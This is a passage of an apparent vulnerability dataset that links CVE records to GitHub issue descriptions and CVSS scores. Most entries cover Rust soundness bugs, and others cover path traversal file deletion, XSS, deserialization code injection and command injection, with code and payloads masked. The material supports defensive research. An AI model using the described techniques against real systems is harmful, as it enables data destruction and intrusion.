        "Issue_Url_old": "https://github.com/tokio-rs/tokio/issues/4225",
        "Issue_Url_new": "https://github.com/tokio-rs/tokio/issues/4225",
        "Repo_new": "tokio-rs/tokio",
        "Issue_Created_At": "2021-11-12T01:00:56Z",
        "description": "Race leads to panic in APITAG . Version Reproduced with tokio NUMBERTAG and NUMBERTAG Platform APITAG Description There is a race between APITAG , APITAG , and APITAG . The following program yields a panic roughly every NUMBERTAG seconds on my NUMBERTAG c NUMBERTAG t workstation, compiled with Rust NUMBERTAG in release mode: CODETAG All of the panics occur when APITAG attempts ERRORTAG . For example: ERRORTAG I suspect this is a race where the APITAG happens between the APITAG check and the ERRORTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35896",
        "Issue_Url_old": "https://github.com/housleyjk/ws-rs/issues/291",
        "Issue_Url_new": "https://github.com/housleyjk/ws-rs/issues/291",
        "Repo_new": "housleyjk/ws-rs",
        "Issue_Created_At": "2019-09-04T17:04:34Z",
        "description": "out_buffer grows until allocation fails. I've been using APITAG in an application which passes images from an embedded device to a webpage, as a simple video streaming solution. On very rare occasions, the system suffers from memory exhaustion, prints something like APITAG and crashes. I've managed to trigger this situation and catch it in the debugger. The issue appears to be APITAG growing without bounds. Here's a full backtrace: ERRORTAG I tried to limit the size of APITAG by configuring APITAG in the Builder settings. The debugger confirms that these settings have been applied. However, APITAG has still grown to a much larger size than expected: ERRORTAG Specifically, APITAG is much larger than the fixed capacity of APITAG . Digging into the source, it seems like the only place this buffer is touched is APITAG URLTAG . Do you have any ideas why the buffer could be growing large enough to trigger allocation failures?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36446",
        "Issue_Url_old": "https://github.com/kitsuneninetails/signal-rust/issues/2",
        "Issue_Url_new": "https://github.com/kitsuneninetails/signal-rust/issues/2",
        "Repo_new": "kitsuneninetails/signal-rust",
        "Issue_Created_At": "2020-11-15T08:59:37Z",
        "description": "APITAG should have a bound on T: Send. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG object implements Send and Sync unconiditionally: URLTAG However, this should probably be bounded by T: Send in both, otherwise it allows sending types that should never be sent across threads such as Rc or references to cells. You can see an example of such a data race with cells below: ERRORTAG which outputs: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-38191",
        "Issue_Url_old": "https://github.com/tokio-rs/tokio/issues/3929",
        "Issue_Url_new": "https://github.com/tokio-rs/tokio/issues/3929",
        "Repo_new": "tokio-rs/tokio",
        "Issue_Created_At": "2021-07-06T09:45:58Z",
        "description": "Task dropped in wrong thread when aborting APITAG task. When aborting a task with APITAG , the future is dropped in the thread calling abort if the task is not currently being executed. This is incorrect for tasks spawned on a APITAG . See this example that exploits it to send a non send value to a different thread: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-36449",
        "Issue_Url_old": "https://github.com/motoras/kekbit/issues/34",
        "Issue_Url_new": "https://github.com/motoras/kekbit/issues/34",
        "Repo_new": "motoras/kekbit",
        "Issue_Created_At": "2020-12-18T22:53:51Z",
        "description": "APITAG allows sending non Send type across threads. Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG implements Send trait regardless of the inner type parameter H . This definition allows safe Rust code to send non Send type across threads, which potentially causes a data race or undefined behavior. APITAG trait bound should probably be added to APITAG 's Send implementation. If all handlers are expected to be Send , then Send bound can be added to Handler trait's definition instead. Reproduction Below is an example program that shows non Send type can be sent across threads using safe APIs of kekbit . APITAG Detail APITAG APITAG ERRORTAG Output: ERRORTAG Tested Environment Crate: kekbit Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG rd party dependencies: APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-25004",
        "Issue_Url_old": "https://github.com/google/flatbuffers/issues/5530",
        "Issue_Url_new": "https://github.com/google/flatbuffers/issues/5530",
        "Repo_new": "google/flatbuffers",
        "Issue_Created_At": "2019-09-24T20:49:59Z",
        "description": "Rust] impl Follow for bool is unsound. The implementation impl Follow for bool is defined [here URLTAG and ends up calling APITAG . APITAG is for all intents and purposes a transmute and therefore given a byte that is not exactly APITAG or APITAG will produce a value of bool that has an invalid underlying bit pattern. That is UB in Rust. Invoking it is as easy as APITAG or something along the lines.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36216",
        "Issue_Url_old": "https://github.com/petabi/eventio/issues/33",
        "Issue_Url_new": "https://github.com/petabi/eventio/issues/33",
        "Repo_new": "petabi/eventio",
        "Issue_Created_At": "2020-12-20T05:50:21Z",
        "description": "Soundness issue: Input APITAG can be misused to create data race to an object. Hello :crab: , we APITAG group APITAG gatech) found a soundness issue in this crate while scanning Rust code on APITAG for potential vulnerabilities. Soundness Issue Send is unconditionally implemented for APITAG , so that it is possible to send APITAG to other threads even when R is not Send . ERRORTAG When APITAG is misused, it is possible to create a data race to a non Sync object. Proof of Concept The example below program creates a data race to a Cell using APITAG modified from URLTAG Multiple threads concurrently update the same Cell that counts the number of read events, making the Cell to contain incorrect statistics. APITAG compares the value contained inside Cell with the exact number of read s that happened. APITAG is a Read object that contains a non Send object ( APITAG ) Program output is shown after the program below ERRORTAG Program output When compiled with APITAG & run on APITAG , outputs from NUMBERTAG executions of the program was as below. CODETAG Suggested Solution Simply adding trait bound APITAG to the Send impl for APITAG will allow the compiler to revoke programs like the above. After the change, APITAG can no longer carry non Send objects when moving across thread boundaries. ERRORTAG Thank you for very much for checking out this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-15546",
        "Issue_Url_old": "https://github.com/ihalila/pancurses/issues/66",
        "Issue_Url_new": "https://github.com/ihalila/pancurses/issues/66",
        "Repo_new": "ihalila/pancurses",
        "Issue_Created_At": "2019-06-09T06:59:02Z",
        "description": "mvprintw and printw should not be exposed. These take format strings, and are trivial to cause memory safety issues which an attacker can exploit with URLTAG If you must expose them, they need to be marked as ERRORTAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35922",
        "Issue_Url_old": "https://github.com/tokio-rs/mio/issues/1386",
        "Issue_Url_new": "https://github.com/tokio-rs/mio/issues/1386",
        "Repo_new": "tokio-rs/mio",
        "Issue_Created_At": "2020-11-02T09:39:03Z",
        "description": "APITAG assumes the layout of APITAG matches libc::sockaddr. MENTIONTAG noted this in URLTAG URLTAG As far as I can tell there are no guarantees from std about the layout of APITAG , and this code could silently compile and cause UB elsewhere if the representation changes (e.g. if padding is added early on in the struct, resulting in C code reading uninitialized bytes).",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-16881",
        "Issue_Url_old": "https://github.com/mvdnes/portaudio-rs/issues/20",
        "Issue_Url_new": "https://github.com/mvdnes/portaudio-rs/issues/20",
        "Repo_new": "mvdnes/portaudio-rs",
        "Issue_Created_At": "2019-09-13T16:53:01Z",
        "description": "Stream callback procedure is not unwind safe. It is observed that the APITAG and APITAG functions are not unwind safe, as their definitions shown below. ERRORTAG If the user provided closure could possibly panic, the APITAG of boxed APITAG would not be reachable, which causes its memory to be deallocated, thus resulting in an use after free . Since the APITAG contains two function pointers which might be executed later on, it is obvious that an arbitrary code execution can be constructed maliciously by this way. Therefore, this is highly vulnerable and should be fixed.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35903",
        "Issue_Url_old": "https://github.com/elrnv/dync/issues/4",
        "Issue_Url_new": "https://github.com/elrnv/dync/issues/4",
        "Repo_new": "elrnv/dync",
        "Issue_Created_At": "2020-09-27T18:47:27Z",
        "description": "APITAG allows for misaligned access. Hey there, I noticed that in APITAG the backing storage for the Vec is a APITAG . URLTAG I believe this let's you trigger undefined behavior in the form of misaligned memory access through safe rust code by instantiating a APITAG with a type that has different alignment requirements from APITAG . Running the following program under miri URLTAG : ERRORTAG results in: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-36452",
        "Issue_Url_old": "https://github.com/L117/array-tools/issues/2",
        "Issue_Url_new": "https://github.com/l117/array-tools/issues/2",
        "Repo_new": "L117/array-tools",
        "Issue_Created_At": "2021-01-01T00:51:21Z",
        "description": "APITAG can cause dropping uninitialized memory. Hello \ud83e\udd80 , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG URLTAG If the APITAG (user supplied APITAG ) panics within APITAG , then APITAG with its uninitialized APITAG is dropped. The Drop impl of APITAG assumes that APITAG is a properly initialized array, and thus APITAG can be invoked on an uninitialized memory blob. Thank you for checking out this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36448",
        "Issue_Url_old": "https://github.com/krl/cache/issues/1",
        "Issue_Url_new": "https://github.com/krl/cache/issues/1",
        "Repo_new": "krl/cache",
        "Issue_Created_At": "2020-11-24T18:56:44Z",
        "description": "Cache's Send trait and Sync trait should have bounds. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the Cache object implements the Send and Sync traits for all types: URLTAG However, this should also probably be bounded by K: Send and K: Sync. Otherwise, it's possible to smuggle non Send types across thread boundaries or share non Sync types across thread boundaries. Here's an example of a data race in safe Rust code through a Cache. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35919",
        "Issue_Url_old": "https://github.com/deprecrated/net2-rs/issues/105",
        "Issue_Url_new": "https://github.com/deprecrated/net2-rs/issues/105",
        "Repo_new": "deprecrated/net2-rs",
        "Issue_Created_At": "2020-11-07T13:33:08Z",
        "description": "net2 assumes the layout of APITAG matches libc::sockaddr. The problem code is here: URLTAG It assumes that the layout of APITAG matches APITAG , but this can't be assumed. Related issues: URLTAG URLTAG URLTAG Mio has roughly the same code, this was fixed in URLTAG for socket2: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-36438",
        "Issue_Url_old": "https://github.com/KizzyCode/tiny_future/issues/1",
        "Issue_Url_new": "https://github.com/kizzycode/tiny_future-rust/issues/1",
        "Repo_new": "kizzycode/tiny_future-rust",
        "Issue_Created_At": "2020-12-08T05:17:36Z",
        "description": "Send and Sync traits for Future should be bound by APITAG . Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that tiny_future implements Send and Sync for all types: URLTAG This should probably be bound by APITAG , otherwise this allows non Send types such as Rc to be sent across thread boundaries which might invoke undefined behavior. Here's an example of this in action with an Rc segfaulting safe Rust code: ERRORTAG Output: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-26307",
        "Issue_Url_old": "https://github.com/gz/rust-cpuid/issues/40",
        "Issue_Url_new": "https://github.com/gz/rust-cpuid/issues/40",
        "Repo_new": "gz/rust-cpuid",
        "Issue_Created_At": "2021-01-17T16:49:24Z",
        "description": "Incorrect (and probably unsound) transmutes. The code contains several transmutes similar to this: ERRORTAG Reading about FILETAG , this is not correct, because the Rust compiler is free to reorder the fields of the struct. It is also probably unsound, because the Rust compiler is free to add padding. Adding APITAG may be a fix. However I am not sure what role endianness plays here (same question as NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45708",
        "Issue_Url_old": "https://github.com/TimelyDataflow/abomonation/issues/23",
        "Issue_Url_new": "https://github.com/timelydataflow/abomonation/issues/23",
        "Repo_new": "timelydataflow/abomonation",
        "Issue_Created_At": "2019-09-19T17:22:07Z",
        "description": "Can the pointer alignment situation be improved?. As the docs say, abomonation currently doesn't guarantee correct pointer alignment. This is pretty dangerous, even on NUMBERTAG as rustc might be tempted to generate those evil SIMD instructions that assume the data is aligned and raise an exception otherwise someday. I wonder if there is an API tweak we could use to improve upon this situation?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26601",
        "Issue_Url_old": "https://github.com/ImpressCMS/impresscms/issues/914",
        "Issue_Url_new": "https://github.com/impresscms/impresscms/issues/914",
        "Repo_new": "impresscms/impresscms",
        "Issue_Created_At": "2021-02-02T21:54:17Z",
        "description": "Arbitrary File Deletion via Path Traversal in FILETAG . Link : URLTAG Date NUMBERTAG UTC By : egix Weakness : Path Traversal Details : Summary: The vulnerability is located in the APITAG script: ERRORTAG User input passed through the \"image_temp\" parameter is not properly sanitized before being used in a call to the ERRORTAG function at lines NUMBERTAG and NUMBERTAG This can be exploited to carry out Path Traversal attacks and delete arbitrary files in the context of the web server process. NOTE : before being deleted, the file will be copied into the APITAG directory. As such, by firstly deleting the APITAG file in that directory, it might be possible to disclose the content of arbitrary files in case the web server allows for directory listing. APITAG branch : The vulnerability has been tested and confirmed on APITAG version NUMBERTAG the latest at the time of writing). Steps To Reproduce NUMBERTAG Login into the application as any user (this should work both for Webmasters and Registered Users NUMBERTAG Go to: APITAG NUMBERTAG The APITAG script will be deleted, rendering the website unusable Impact This vulnerability might allow authenticated attackers to delete arbitrary files, potentially leading to a Denial of Service APITAG condition or destruction of users data.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15602",
        "Issue_Url_old": "https://github.com/itworkcenter/fileview/issues/1",
        "Issue_Url_new": "https://github.com/itworkcenter/fileview/issues/1",
        "Repo_new": "itworkcenter/fileview",
        "Issue_Created_At": "2019-07-09T20:53:59Z",
        "description": "Security Issue. I'm a member of the FILETAG Foundation Security Working Group and we received a report of a vulnerability in this module. We tried inviting the author by e mail but received no response so I'm opening this issue and inviting anyone with commit and npm publish rights to collaborate with us on a fix.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19919",
        "Issue_Url_old": "https://github.com/wycats/handlebars.js/issues/1558",
        "Issue_Url_new": "https://github.com/handlebars-lang/handlebars.js/issues/1558",
        "Repo_new": "handlebars-lang/handlebars.js",
        "Issue_Created_At": "2019-09-21T13:43:28Z",
        "description": "Disallow calling APITAG and APITAG directly. The recent remote code execution exploits where misusing the helper APITAG in order to call methods from object prototypes that actually should not have been called. The helpers APITAG and APITAG are not meant to be called directly.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8857",
        "Issue_Url_old": "https://github.com/mishoo/UglifyJS2/issues/751",
        "Issue_Url_new": "https://github.com/mishoo/uglifyjs/issues/751",
        "Repo_new": "mishoo/uglifyjs",
        "Issue_Created_At": "2015-07-21T22:25:26Z",
        "description": "uglify c changes behavior of mdast code. I've created a repo to reproduce this bug: URLTAG For the mdast URLTAG markdown library, the source succeeds when not uglified, and then, passed through APITAG , its behavior changes and it breaks. I'm trying to dig through the source, passed through APITAG and then APITAG , in order to track down the cause. It's quite a doozy",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-5786",
        "Issue_Url_old": "https://github.com/GoogleChrome/puppeteer/issues/4141",
        "Issue_Url_new": "https://github.com/puppeteer/puppeteer/issues/4141",
        "Repo_new": "puppeteer/puppeteer",
        "Issue_Created_At": "2019-03-08T20:06:56Z",
        "description": "CVETAG . Just wanted to quickly verify if master || APITAG has a patch for this vulnerability since all external docs point to a major version that's not where pptr is at. Since I'm not familiar with how changes are backported/forward ported, and most folks here probably aren't as well, it'd be great to get a sense of if pptr is effected. Thanks!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-8856",
        "Issue_Url_old": "https://github.com/expressjs/serve-index/issues/28",
        "Issue_Url_new": "https://github.com/expressjs/serve-index/issues/28",
        "Repo_new": "expressjs/serve-index",
        "Issue_Created_At": "2015-03-14T01:21:57Z",
        "description": "XSS via filename. serve index directory listings are vulnerable to XSS via arbitrary uploader controlled filenames. Repro steps NUMBERTAG Run URLTAG NUMBERTAG APITAG NUMBERTAG ERRORTAG NUMBERTAG Load the serve index server in Chrome NUMBERTAG see an alert box I spotted this when testing webpack dev server, which is also vulnerable as it uses serve index.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-7691",
        "Issue_Url_old": "https://github.com/MrRio/jsPDF/issues/2971",
        "Issue_Url_new": "https://github.com/parallax/jspdf/issues/2971",
        "Repo_new": "parallax/jspdf",
        "Issue_Created_At": "2020-10-20T19:40:50Z",
        "description": "Address CVETAG ( very similar to CVETAG ). Hello! This vulnerability is very similar to NUMBERTAG so I think it should be already fixed. The fact is that gemnasium that is dependency scanner is warning about this issue: + + + | Severity | Medium | | Identifier | CVETAG | | URL | URLTAG | | Scanner | gemnasium | | Message | Cross site Scripting in jspdf | | Package | jspdf NUMBERTAG Solution | Unfortunately, there is no solution available yet. | | Path | | | File | APITAG | + + + And it is very similar to the one that was solved in the mentioned issue, so I don't know if there is something needed to do. I did a test and it is working well FILETAG If you could do a quick check I will appreciate it. Thank you!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-5682",
        "Issue_Url_old": "https://github.com/swagger-api/swagger-ui/issues/1865",
        "Issue_Url_new": "https://github.com/swagger-api/swagger-ui/issues/1865",
        "Repo_new": "swagger-api/swagger-ui",
        "Issue_Created_At": "2016-01-13T04:45:25Z",
        "description": "Property names are not escaped and allow XSS. To reproduce, point swagger ui at a JSON schema file that uses a model with a property containing \" APITAG alert NUMBERTAG APITAG \". The script will execute. I've attached a sinatra server that demonstrates the issue by replacing the APITAG property with APITAG APITAG : URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5941",
        "Issue_Url_old": "https://github.com/luin/serialize/issues/4",
        "Issue_Url_new": "https://github.com/luin/serialize/issues/4",
        "Repo_new": "luin/serialize",
        "Issue_Created_At": "2017-02-09T08:09:14Z",
        "description": "APITAG can be abused to achieve arbitrary code injection with an IIFE. ERRORTAG I don't know if this is a functionality as you are using APITAG internally, but the module should not execute code on deserialization.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8268",
        "Issue_Url_old": "https://github.com/sonnyp/JSON8/issues/113",
        "Issue_Url_new": "https://github.com/sonnyp/json8/issues/113",
        "Repo_new": "sonnyp/json8",
        "Issue_Created_At": "2020-09-12T11:51:50Z",
        "description": "Prototype Pollution Vulnerability in \"json8 merge patch\". Prototype Pollution This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior, which may allow obtaining sensitive PATHTAG If required I can submit a POC through a secured channel. Thanks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-23732",
        "Issue_Url_old": "https://github.com/Quobject/docker-cli-js/issues/22",
        "Issue_Url_new": "https://github.com/quobject/docker-cli-js/issues/22",
        "Repo_new": "quobject/docker-cli-js",
        "Issue_Created_At": "2021-11-11T20:38:01Z",
        "description": "Document lack of sanitization. This code appears to use child processes but doesn't sanitize the input. A project I was working on used this code for something like the following to run something in a container of the user's choosing: APITAG If the user just entered a semicolon after the container name, they could easily inject/run arbitrary commands on the host machine. It's easy enough to only allow valid container names and nothing more in this instance, but the problem was not knowing that there was no sanitization being done behind the scenes. A more ambitious goal might be to make sure no malicious user input can get through, but until that's implemented there should at least be a note in the documentation about it.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.0,
        "impactScore": 6.0,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-16472",
        "Issue_Url_old": "https://github.com/ashaffer/cached-path-relative/issues/3",
        "Issue_Url_new": "https://github.com/ashaffer/cached-path-relative/issues/3",
        "Repo_new": "ashaffer/cached-path-relative",
        "Issue_Created_At": "2018-09-07T07:05:45Z",
        "description": "Security issue. Hello, As a member of the\u00a0 FILETAG Security WG URLTAG I would like to draw your attention to a security report that has been made regarding this package. I have made attempts to contact the person identified as a maintainer of this package but did not get any answer. What is the best way to reach someone with commit rights over this repo and hopefully npm publishing rights as well, in order to invite them to privately discuss the issue on the APITAG platform and provide a resolution? Thanks, Liran References: FILETAG \u00a0",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15138",
        "Issue_Url_old": "https://github.com/marcbachmann/node-html-pdf/issues/530",
        "Issue_Url_new": "https://github.com/marcbachmann/node-html-pdf/issues/530",
        "Repo_new": "marcbachmann/node-html-pdf",
        "Issue_Created_At": "2019-09-18T21:37:31Z",
        "description": "npm audit vulnerability . Hey there, an npm advisory is out for this package. URLTAG Is there any timeline to resolve this?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13118",
        "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/1943",
        "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/1943",
        "Repo_new": "sparklemotion/nokogiri",
        "Issue_Created_At": "2019-11-17T17:57:50Z",
        "description": "Investigate libxslt vulnerabilities patched in USN NUMBERTAG This issue is to drive investigation and potential action around a set of upstream patches that Canonical judged valuable enough to port to their distributions. References: URLTAG FILETAG PATHTAG CVETAG .html FILETAG PATHTAG CVETAG .html FILETAG PATHTAG CVETAG .html",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7595",
        "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/1992",
        "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/1992",
        "Repo_new": "sparklemotion/nokogiri",
        "Issue_Created_At": "2020-02-10T15:42:05Z",
        "description": "Investigate libxml2 vulnerabilities patched in USN NUMBERTAG This issue is to drive investigation and potential action around a set of upstream patches that Canonical judged valuable enough to port to their distributions. References: URLTAG FILETAG PATHTAG CVETAG .html FILETAG PATHTAG CVETAG .html Summary To be filed in as investigation proceeds History of this notification NUMBERTAG USN NUMBERTAG published by Canonical NUMBERTAG this github issue created",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3517",
        "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/2233",
        "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/2233",
        "Repo_new": "sparklemotion/nokogiri",
        "Issue_Created_At": "2021-05-13T16:59:41Z",
        "description": "Upgrade packaged libxml2 to NUMBERTAG libxml NUMBERTAG was released today NUMBERTAG Let's plan on upgrading to it for the next release. [ ] update APITAG [ ] remove patches that are no longer needed, ensure remaining patches apply cleanly [ ] get all the tests green, particularly under valgrind",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.7,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3517",
        "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/2274",
        "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/2274",
        "Repo_new": "sparklemotion/nokogiri",
        "Issue_Created_At": "2021-06-17T21:44:25Z",
        "description": "Investigate libxml2 vulnerabilities patched in USN NUMBERTAG This issue is to drive investigation and potential action around a set of upstream patches that Canonical judged valuable enough to backport to their distributions using a NUMBERTAG based version. References: URLTAG APITAG that it seems likely these are all backports from NUMBERTAG APITAG which Nokogiri is already using, but this issue exists so that I check that assumption.) History of this notication NUMBERTAG issue created after USN was issued",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.7,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-11068",
        "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/1892",
        "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/1892",
        "Repo_new": "sparklemotion/nokogiri",
        "Issue_Created_At": "2019-04-16T03:39:10Z",
